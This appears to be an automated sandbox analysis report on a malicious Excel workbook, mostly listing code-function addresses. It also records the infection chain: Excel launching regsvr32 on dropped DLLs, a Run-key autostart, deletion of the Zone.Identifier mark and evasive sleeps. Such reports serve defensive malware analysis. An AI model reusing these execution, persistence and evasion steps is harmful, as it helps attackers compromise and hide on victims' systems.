                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800168B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180026AB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800184BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800190BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800056BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002B6C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180017CC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180009AC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002B0C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001C6CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800072CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180026CD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180020ED4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000BCD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800116DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180006ADC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800114E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800166E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800154EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800040EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800012F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800288F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800036FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001FD00
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000D704
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000FB04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001E30C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180015714
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002A518
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180021918
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180004918
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001531C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000A31C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180020D20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000E720
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001A524
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000D52C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180024F30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000C930
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180025938
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000F138
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000E93C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180027344
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180001744
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001D150
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180004B50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180010D54
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180022158
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180015958
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002B55C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180029360
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180018764
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180028768
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180017B68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001A170
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180003970
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180004D70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180010F74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180018F80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180024D84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002A784
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180016F84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002358C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180028F8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180029590
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180021594
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180011194
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180029198
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000A198
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002539C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800033A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800247AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800233B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800243B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180027DB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800027B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180026FBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180006BBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001B5C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800031C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180012FC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001FFD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001FBD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800117E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000C1E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_002E0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180025C1C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180015E70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002AC7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000DC7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180008688
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800078B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800058C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800018F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800132FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180009D2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180022334
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180002D54
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180003B78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001A788
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001D5B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800143B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001FDF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800043F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000C3F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001D7F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001DC00
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000C800
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001EC08
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000F60C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002B814
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180007418
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001E61C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000421C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180007620
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000BE20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180017824
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180003824
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180023228
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180010628
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001DE2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000A42C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000E42C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001CA34
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001DA34
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180028C38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001EA38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002803C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002B23C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180011C3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180023840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002A244
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180027448
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180023E4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180019C4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180001650
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000D250
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001B058
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002765C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000145C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000EE5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180013A60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180027A68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180002A6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002AA74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180014274
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180017E74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000D87C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180002480
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000FE84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180020490
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180029094
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800098AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800164B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800168B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180026AB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800184BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800190BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800056BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002B6C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180017CC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180009AC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002B0C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001C6CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800072CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180026CD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180020ED4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000BCD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800116DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180006ADC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800114E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800166E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800154EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800040EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800012F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800288F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800036FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001FD00
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000D704
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000FB04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001E30C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180015714
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002A518
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180021918
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180004918
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001531C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000A31C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180020D20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000E720
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001A524
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000D52C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180024F30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000C930
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180025938
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000F138
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000E93C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180027344
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180001744
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001D150
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180004B50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180010D54
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180022158
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180015958
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002B55C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180029360
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180018764
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180028768
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180017B68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001A170
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180003970
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180004D70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180010F74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180018F80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180024D84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002A784
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180016F84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002358C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180028F8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180029590
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180021594
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180011194
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180029198
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000A198
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002539C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800033A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800247AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800233B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800243B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180027DB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800027B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180026FBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180006BBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001B5C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800031C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180012FC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001FFD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001FBD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800117E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000C1E0
                      Source: 4470_02112022.xlsMacro extractor: Sheet name: Sheet6
                      Source: 4470_02112022.xlsMacro extractor: Sheet name: Sheet6
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dll FB9AB8EFA3269F359F9010AECC543E992705E900CC11B02DBDFB1C6572A5500A
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\oxnv4.ooccxx FB9AB8EFA3269F359F9010AECC543E992705E900CC11B02DBDFB1C6572A5500A
                      Source: Joe Sandbox ViewDropped File: C:\Windows\System32\XXKTOC\CASBb.dll (copy) FB9AB8EFA3269F359F9010AECC543E992705E900CC11B02DBDFB1C6572A5500A
                      Source: 4470_02112022.xlsReversingLabs: Detection: 80%
                      Source: 4470_02112022.xlsVirustotal: Detection: 67%
                      Source: 4470_02112022.xlsMetadefender: Detection: 31%
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv1.ooccxx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv2.ooccxx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv3.ooccxx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv4.ooccxx
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XXKTOC\CASBb.dll"
                      Source: unknownProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\XXKTOC\CASBb.dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv1.ooccxx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv2.ooccxx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv3.ooccxx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv4.ooccxx
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XXKTOC\CASBb.dll"
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\FJW3SUUT.txtJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR6315.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@12/10@4/50
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: 4470_02112022.xlsOLE indicator, Workbook stream: true
                      Source: 4470_02112022.xls.0.drOLE indicator, Workbook stream: true
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180009D2C CloseHandle,Process32NextW,CreateToolhelp32Snapshot,Process32FirstW,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1001B1B0 FindResourceA,LoadResource,LockResource,FreeResource,
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: 4470_02112022.xlsInitial sample: OLE indicators vbamacros = False
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180006870 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180009097 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800230F3 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180006957 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180006212 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180008A56 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180005A82 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180006415 push ebp; retf
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00000001800224FA push ebp; ret
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180008D61 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000658C push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180008E30 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180006633 push ebp; retf
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180006738 push 45C7D274h; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180008F44 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10014064 GetModuleHandleA,LoadLibraryA,GetProcAddress,
                      Source: oxnv4.ooccxx.0.drStatic PE information: real checksum: 0xc56a8 should be: 0xc2343
                      Source: 40hd04O0[1].dll.0.drStatic PE information: real checksum: 0xc56a8 should be: 0xc2343
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XXKTOC\CASBb.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\oxnv4.ooccxxJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\XXKTOC\CASBb.dll (copy)Jump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\oxnv4.ooccxxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dllJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\XXKTOC\CASBb.dll (copy)Jump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\oxnv4.ooccxxJump to dropped file

                      Boot Survival

                      barindex
                      Creates an autostart registry key pointing to binary in C:\Windows
                      Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CASBb.dllJump to behavior
                      Drops PE files to the user root directory
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\oxnv4.ooccxxJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CASBb.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CASBb.dllJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\XXKTOC\CASBb.dll:Zone.Identifier read attributes | delete
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10020690 IsWindowVisible,IsIconic,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10010AE4 IsIconic,GetWindowPlacement,GetWindowRect,
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\regsvr32.exe TID: 1228Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\System32\regsvr32.exe TID: 1212Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\System32\regsvr32.exe TID: 1700Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\System32\regsvr32.exe TID: 1700Thread sleep time: -60000s >= -30000s
